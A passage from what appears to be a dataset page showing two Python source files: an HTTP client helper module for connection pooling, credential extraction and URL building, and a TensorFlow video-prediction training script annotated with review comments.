        self.conns = {} # HTTP connections keyed by (scheme, host)
        self.lock = Lock()
    def get(self, url):
        scheme, host = urlsplit(url, 'http', False)[:2]
        conn = None
        # Reuse a pooled connection when one is available.
        self.lock.acquire()
        try:
            available = self.conns.setdefault((scheme, host), [])
            if available:
                conn = available.pop()
        finally:
            self.lock.release()
        if conn is not None:
            return conn
        # Nothing pooled: open a fresh connection.
        if scheme == 'http':
            cls = HTTPConnection
        elif scheme == 'https':
            cls = HTTPSConnection
        else:
            raise ValueError('%s is not a supported scheme' % scheme)
        conn = cls(host, timeout=self.timeout)
        conn.connect()
        return conn
    def release(self, url, conn):
        scheme, host = urlsplit(url, 'http', False)[:2]
        self.lock.acquire()
        try:
            self.conns.setdefault((scheme, host), []).append(conn)
        finally:
            self.lock.release()
    def __del__(self):
        # Close every pooled connection when the pool itself goes away.
        for pooled in list(self.conns.values()):
            for conn in pooled:
                conn.close()
class Resource(object):
    """Convenience wrapper around a base URL providing HTTP verb helpers.

    Credentials embedded in *url* are extracted once and sent with every
    request made through this resource.
    """
    def __init__(self, url, session, headers=None):
        """:param url: base URL; may embed ``user:password@`` credentials
        :param session: a `Session`, or None to create a private one
        :param headers: default headers sent with every request
        """
        self.url, self.credentials = extract_credentials(url)
        if session is None:
            session = Session()
        self.session = session
        self.headers = headers or {}
    def __call__(self, *path):
        # Derive a child resource for the given sub-path, sharing the session
        # and copying credentials and default headers.
        obj = type(self)(urljoin(self.url, *path), self.session)
        obj.credentials = self.credentials
        obj.headers = self.headers.copy()
        return obj
    def delete(self, path=None, headers=None, **params):
        return self._request('DELETE', path, headers=headers, **params)
    def get(self, path=None, headers=None, **params):
        return self._request('GET', path, headers=headers, **params)
    def head(self, path=None, headers=None, **params):
        return self._request('HEAD', path, headers=headers, **params)
    def post(self, path=None, body=None, headers=None, **params):
        return self._request('POST', path, body=body, headers=headers,
                             **params)
    def put(self, path=None, body=None, headers=None, **params):
        return self._request('PUT', path, body=body, headers=headers, **params)
    def delete_json(self, path=None, headers=None, **params):
        return self._request_json('DELETE', path, headers=headers, **params)
    def get_json(self, path=None, headers=None, **params):
        return self._request_json('GET', path, headers=headers, **params)
    def post_json(self, path=None, body=None, headers=None, **params):
        return self._request_json('POST', path, body=body, headers=headers,
                                  **params)
    def put_json(self, path=None, body=None, headers=None, **params):
        return self._request_json('PUT', path, body=body, headers=headers,
                                  **params)
    def _request(self, method, path=None, body=None, headers=None, **params):
        # Merge per-call headers over the resource's defaults.
        all_headers = self.headers.copy()
        all_headers.update(headers or {})
        if path is not None:
            url = urljoin(self.url, path, **params)
        else:
            url = urljoin(self.url, **params)
        return self.session.request(method, url, body=body,
                                    headers=all_headers,
                                    credentials=self.credentials)
    def _request_json(self, method, path=None, body=None, headers=None, **params):
        status, headers, data = self._request(method, path, body=body,
                                              headers=headers, **params)
        # BUG FIX: headers.get('content-type') is None when the server sends
        # no Content-Type header, and `'...' in None` raises TypeError.
        # Default to '' so the body is simply passed through undecoded.
        if 'application/json' in (headers.get('content-type') or ''):
            data = json.decode(data.read())
        return status, headers, data
def extract_credentials(url):
    """Split authentication credentials out of *url*.

    Returns a ``(clean_url, credentials)`` pair where ``credentials`` is a
    ``(username, password)`` tuple, or ``None`` when the URL carries no
    user info.

    >>> extract_credentials('http://localhost:5984/_config/')
    ('http://localhost:5984/_config/', None)
    >>> extract_credentials('http://joe:secret@localhost:5984/_config/')
    ('http://localhost:5984/_config/', ('joe', 'secret'))
    >>> extract_credentials('http://joe%40example.com:secret@localhost:5984/_config/')
    ('http://localhost:5984/_config/', ('joe@example.com', 'secret'))
    """
    parts = list(urlsplit(url))
    netloc = parts[1]
    credentials = None
    if '@' in netloc:
        creds, netloc = netloc.split('@')
        # Each component is percent-decoded so encoded '@' etc. round-trip.
        credentials = tuple(urllib.unquote(part) for part in creds.split(':'))
        parts[1] = netloc
    return urlunsplit(parts), credentials
def basic_auth(credentials):
    """Build an HTTP Basic ``Authorization`` header value.

    Returns ``None`` for empty/None *credentials* so callers can skip the
    header entirely; otherwise *credentials* must be a (user, password) pair.
    """
    if not credentials:
        return None
    return 'Basic %s' % b64encode('%s:%s' % credentials)
def quote(string, safe=''):
    """Percent-encode *string* for use in a URL path segment.

    Unicode input is UTF-8 encoded first; *safe* lists characters that must
    not be escaped (none by default, so '/' is escaped too).
    """
    if isinstance(string, unicode):
        return urllib.quote(string.encode('utf-8'), safe)
    return urllib.quote(string, safe)
def urlencode(data):
    """Form-encode query parameters, UTF-8 encoding any unicode values.

    *data* may be a dict or a sequence of ``(name, value)`` pairs.
    """
    if isinstance(data, dict):
        data = data.items()
    encoded = []
    for name, value in data:
        if isinstance(value, unicode):
            value = value.encode('utf-8')
        encoded.append((name, value))
    return urllib.urlencode(encoded)
def urljoin(base, *path, **query):
    """Assemble a uri based on a base, any number of path segments, and query
    string parameters.

    >>> urljoin('http://example.org', '_all_dbs')
    'http://example.org/_all_dbs'

    A trailing slash on the uri base is handled gracefully:

    >>> urljoin('http://example.org/', '_all_dbs')
    'http://example.org/_all_dbs'

    And multiple positional arguments become path parts:

    >>> urljoin('http://example.org/', 'foo', 'bar')
    'http://example.org/foo/bar'

    All slashes within a path part are escaped:

    >>> urljoin('http://example.org/', 'foo/bar')
    'http://example.org/foo%2Fbar'
    >>> urljoin('http://example.org/', 'foo', '/bar/')
    'http://example.org/foo/%2Fbar%2F'
    """
    if base and base.endswith('/'):
        base = base[:-1]
    pieces = [base]
    # Each positional segment is individually quoted ('/' included) and the
    # results are glued together with '/' separators.
    segments = '/'.join([''] + [quote(s) for s in path])
    if segments:
        pieces.append(segments)
    # Booleans become 'true'/'false'; None values are dropped; list/tuple
    # values expand into repeated parameters.
    params = []
    for name, value in query.items():
        if type(value) in (list, tuple):
            params.extend([(name, item) for item in value if item is not None])
        elif value is not None:
            if value is True:
                value = 'true'
            elif value is False:
                value = 'false'
            params.append((name, value))
    if params:
        pieces.append('?')
        pieces.append(urlencode(params))
    return ''.join(pieces)
|
|
# Copyright 2016 The TensorFlow Authors All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Code for training the prediction model."""
import numpy as np
import tensorflow as tf
from tensorflow.python.platform import app
from tensorflow.python.platform import flags
from prediction_input import build_tfrecord_input
from prediction_model import construct_model
# Training hyperparameters and I/O settings.
# NOTE(review): DATA_DIR / OUT_DIR are hard-coded, user-specific defaults;
# override them via --data_dir / --output_dir in practice.
# How often to record tensorboard summaries.
SUMMARY_INTERVAL = 40
# How often to run a batch through the validation model.
VAL_INTERVAL = 200
# How often to save a model checkpoint
SAVE_INTERVAL = 2000
# tf record data location:
DATA_DIR = '/home/wangyang59/Data/robot/push/push_train'
# local output directory
OUT_DIR = '/home/wangyang59/Projects/tf_models/video_prediction/tmp/data/stp_run'
FLAGS = flags.FLAGS
flags.DEFINE_string('data_dir', DATA_DIR, 'directory containing data.')
flags.DEFINE_string('output_dir', OUT_DIR, 'directory for model checkpoints.')
flags.DEFINE_string('event_log_dir', OUT_DIR, 'directory for writing summary.')
flags.DEFINE_integer('num_iterations', 100000, 'number of training iterations.')
flags.DEFINE_string('pretrained_model', '',
                    'filepath of a pretrained model to initialize from.')
flags.DEFINE_integer('sequence_length', 10,
                     'sequence length, including context frames.')
flags.DEFINE_integer('context_frames', 2, '# of frames before predictions.')
flags.DEFINE_integer('use_state', 1,
                     'Whether or not to give the state+action to the model')
flags.DEFINE_string('model', 'CDNA',
                    'model architecture to use - CDNA, DNA, or STP')
flags.DEFINE_integer('num_masks', 10,
                     'number of masks, usually 1 for DNA, 10 for CDNA, STN.')
flags.DEFINE_float('schedsamp_k', 900.0,
                   'The k hyperparameter for scheduled sampling,'
                   '-1 for no scheduled sampling.')
flags.DEFINE_float('train_val_split', 0.95,
                   'The percentage of files to use for the training set,'
                   ' vs. the validation set.')
flags.DEFINE_integer('batch_size', 32, 'batch size for training')
flags.DEFINE_float('learning_rate', 0.001,
                   'the base learning rate of the generator')
flags.DEFINE_integer('num_gpus', 1,
                     'the number of gpu to use')
## Helper functions
def peak_signal_to_noise_ratio(true, pred):
  """Image quality metric based on maximal signal power vs. power of the noise.

  Args:
    true: the ground truth image.
    pred: the predicted image.
  Returns:
    peak signal to noise ratio (PSNR)
  """
  # PSNR = 10 * log10(MAX^2 / MSE) with MAX assumed to be 1.0; tf.log is the
  # natural log, hence the division by log(10).
  mse = mean_squared_error(true, pred)
  return 10.0 * tf.log(1.0 / mse) / tf.log(10.0)
def mean_squared_error(true, pred):
  """L2 distance between tensors true and pred.

  Args:
    true: the ground truth image.
    pred: the predicted image.
  Returns:
    mean squared error between ground truth and predicted image.
  """
  squared_diff = tf.square(true - pred)
  return tf.reduce_sum(squared_diff) / tf.to_float(tf.size(pred))
class Model(object):
  """Video-prediction model graph.

  Builds the prediction network via construct_model and attaches the L2
  reconstruction/state loss, per-step PSNR summaries, and an Adam train op.
  """
  def __init__(self,
               images=None,
               actions=None,
               states=None,
               sequence_length=None,
               reuse_scope=None,
               prefix="train"):
    # images/actions/states: batched sequence tensors with time on axis 1
    # (split below). reuse_scope: pass the training scope to build a weight-
    # sharing validation/test copy of the graph. prefix: summary-name prefix.
    if sequence_length is None:
      sequence_length = FLAGS.sequence_length
    # Fed with the current iteration number to drive scheduled sampling.
    self.iter_num = tf.placeholder(tf.float32, [])
    summaries = []
    # Split into timesteps.
    # NOTE(review): tf.squeeze with no axis removes *all* size-1 dims, so
    # the batch dimension would also vanish if batch_size == 1 — confirm
    # batch_size > 1 is always used.
    actions = tf.split(axis=1, num_or_size_splits=int(actions.get_shape()[1]), value=actions)
    actions = [tf.squeeze(act) for act in actions]
    states = tf.split(axis=1, num_or_size_splits=int(states.get_shape()[1]), value=states)
    states = [tf.squeeze(st) for st in states]
    images = tf.split(axis=1, num_or_size_splits=int(images.get_shape()[1]), value=images)
    images = [tf.squeeze(img) for img in images]
    if reuse_scope is None:
      gen_images, gen_states = construct_model(
          images,
          actions,
          states,
          iter_num=self.iter_num,
          k=FLAGS.schedsamp_k,
          use_state=FLAGS.use_state,
          num_masks=FLAGS.num_masks,
          cdna=FLAGS.model == 'CDNA',
          dna=FLAGS.model == 'DNA',
          stp=FLAGS.model == 'STP',
          context_frames=FLAGS.context_frames)
    else: # If it's a validation or test model.
      with tf.variable_scope(reuse_scope, reuse=True):
        gen_images, gen_states = construct_model(
            images,
            actions,
            states,
            iter_num=self.iter_num,
            k=FLAGS.schedsamp_k,
            use_state=FLAGS.use_state,
            num_masks=FLAGS.num_masks,
            cdna=FLAGS.model == 'CDNA',
            dna=FLAGS.model == 'DNA',
            stp=FLAGS.model == 'STP',
            context_frames=FLAGS.context_frames)
    # L2 loss, PSNR for eval.
    # Only predicted frames (after the context frames) are scored; the
    # generator's output at index context_frames-1 predicts the frame at
    # index context_frames, hence the offset slices.
    loss, psnr_all = 0.0, 0.0
    for i, x, gx in zip(
        range(len(gen_images)), images[FLAGS.context_frames:],
        gen_images[FLAGS.context_frames - 1:]):
      recon_cost = mean_squared_error(x, gx)
      psnr_i = peak_signal_to_noise_ratio(x, gx)
      psnr_all += psnr_i
      summaries.append(
          tf.summary.scalar(prefix + '_recon_cost' + str(i), recon_cost))
      summaries.append(tf.summary.scalar(prefix + '_psnr' + str(i), psnr_i))
      loss += recon_cost
    # State-prediction loss, down-weighted by 1e-4 relative to image loss.
    for i, state, gen_state in zip(
        range(len(gen_states)), states[FLAGS.context_frames:],
        gen_states[FLAGS.context_frames - 1:]):
      state_cost = mean_squared_error(state, gen_state) * 1e-4
      summaries.append(
          tf.summary.scalar(prefix + '_state_cost' + str(i), state_cost))
      loss += state_cost
    summaries.append(tf.summary.scalar(prefix + '_psnr_all', psnr_all))
    self.psnr_all = psnr_all
    # Normalize by the number of predicted (non-context) steps.
    self.loss = loss = loss / np.float32(len(images) - FLAGS.context_frames)
    summaries.append(tf.summary.scalar(prefix + '_loss', loss))
    # Learning rate is feedable so validation can run with lr = 0.
    self.lr = tf.placeholder_with_default(FLAGS.learning_rate, ())
    self.train_op = tf.train.AdamOptimizer(self.lr).minimize(loss)
    self.summ_op = tf.summary.merge(summaries)
def main(unused_argv):
  # Build the training and validation graphs, then run the training loop,
  # periodically validating, checkpointing, and writing summaries.
  print 'Constructing models and inputs.'
  with tf.variable_scope('model', reuse=None) as training_scope:
    images, actions, states = build_tfrecord_input(training=True)
    model = Model(images, actions, states, FLAGS.sequence_length)
  # Validation model shares weights with the training model via its scope.
  with tf.variable_scope('val_model', reuse=None):
    val_images, val_actions, val_states = build_tfrecord_input(training=False)
    val_model = Model(val_images, val_actions, val_states,
                      FLAGS.sequence_length, training_scope, "val")
  print 'Constructing saver.'
  # Make saver.
  saver = tf.train.Saver(
      tf.get_collection(tf.GraphKeys.GLOBAL_VARIABLES), max_to_keep=0)
  # Make training session.
  sess = tf.InteractiveSession()
  summary_writer = tf.summary.FileWriter(
      FLAGS.event_log_dir, graph=sess.graph, flush_secs=10)
  if FLAGS.pretrained_model:
    saver.restore(sess, FLAGS.pretrained_model)
  tf.train.start_queue_runners(sess)
  # NOTE(review): the initializer runs *after* saver.restore, so restored
  # pretrained weights are immediately re-initialized (clobbered) — confirm
  # this ordering is intended.
  sess.run(tf.global_variables_initializer())
  tf.logging.info('iteration number, cost')
  # Run training.
  for itr in range(FLAGS.num_iterations):
    # Generate new batch of data.
    feed_dict = {model.iter_num: np.float32(itr),
                 model.lr: FLAGS.learning_rate}
    cost, _, summary_str = sess.run([model.loss, model.train_op, model.summ_op],
                                    feed_dict)
    # Print info: iteration #, cost.
    tf.logging.info(str(itr) + ' ' + str(cost))
    # NOTE(review): `== 2` means validation/saving happen at itr 2, 202, ...
    # (never at 0) — presumably intended to skip startup, verify.
    if (itr) % VAL_INTERVAL == 2:
      # Run through validation set.
      # NOTE(review): this runs val_model.train_op with lr fed as 0.0; the
      # weight delta is zero but Adam's slot variables still update — confirm
      # this is acceptable.
      feed_dict = {val_model.lr: 0.0,
                   val_model.iter_num: np.float32(itr)}
      _, val_summary_str = sess.run([val_model.train_op, val_model.summ_op],
                                    feed_dict)
      summary_writer.add_summary(val_summary_str, itr)
    if (itr) % SAVE_INTERVAL == 2:
      tf.logging.info('Saving model.')
      saver.save(sess, FLAGS.output_dir + '/model' + str(itr))
    # NOTE(review): truthiness test writes summaries on every iteration
    # *except* multiples of SUMMARY_INTERVAL — this looks inverted; confirm.
    if (itr) % SUMMARY_INTERVAL:
      summary_writer.add_summary(summary_str, itr)
  tf.logging.info('Saving model.')
  saver.save(sess, FLAGS.output_dir + '/model')
  tf.logging.info('Training complete')
  tf.logging.flush()
# Script entry point: tf's app.run parses flags and then invokes main().
if __name__ == '__main__':
  app.run()
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.